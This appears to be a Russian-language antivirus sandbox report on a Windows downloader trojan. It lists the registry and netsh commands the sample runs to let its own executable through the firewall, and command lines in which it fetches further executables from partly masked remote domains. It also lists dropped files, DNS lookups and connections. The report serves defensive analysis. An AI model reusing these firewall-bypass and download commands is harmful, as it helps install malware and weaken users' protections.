Техническая информация
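- Изменение в реестре — '%TEMP%\wpd.exe' добавляется в список разрешённых приложений брандмауэра Windows (стандартный профиль): [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%TEMP%\wpd.exe' = '%TEMP%\wpd.exe:*:Enabled:wpd'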
- '%TEMP%\LV_b662.exe' (загружен из сети Интернет)
- '%TEMP%\wpd.exe' -url="http://xz.###dsj.com.cn/dw/<Имя вируса>.32.exe" -param="" -s -local_dir="%TEMP%\"
- '%ProgramFiles%\Internet Explorer\IEXPLORE.EXE' http://up.###dsj.com.cn/soft/tj/inst.asp?us#############################
- '%TEMP%\LV_b662.exe'
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram "%TEMP%\wpd.exe" wpd ENABLE (эта команда добавляет '%TEMP%\wpd.exe' в список программ, разрешённых брандмауэром Windows)
- '%TEMP%\wpd.exe' -url="http://www.do###ivip.com/user/b662/LV_b662.exe" -param="" -s -local_dir="%TEMP%\"
- '%TEMP%\wpd.exe' -url="http://xz.###dsj.com.cn/dw/05/sb662.exe" -param="" -s -local_dir="%TEMP%\"
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\inst[1].asp
- %TEMP%\LV_b662.exe.dt!
- %TEMP%\wpd.exe
- %TEMP%\LV_b662.exe.dt! перемещается (переименовывается) в %TEMP%\LV_b662.exe
- 'up.###dsj.com.cn':80
- 'localhost':1044
- 'www.do###ivip.com':80
- http://up.###dsj.com.cn/soft/tj/inst.asp?us#############################
- http://www.do###ivip.com/user/b662/LV_b662.exe
- DNS ASK up.###dsj.com.cn
- DNS ASK xz.###dsj.com.cn
- DNS ASK www.do###ivip.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''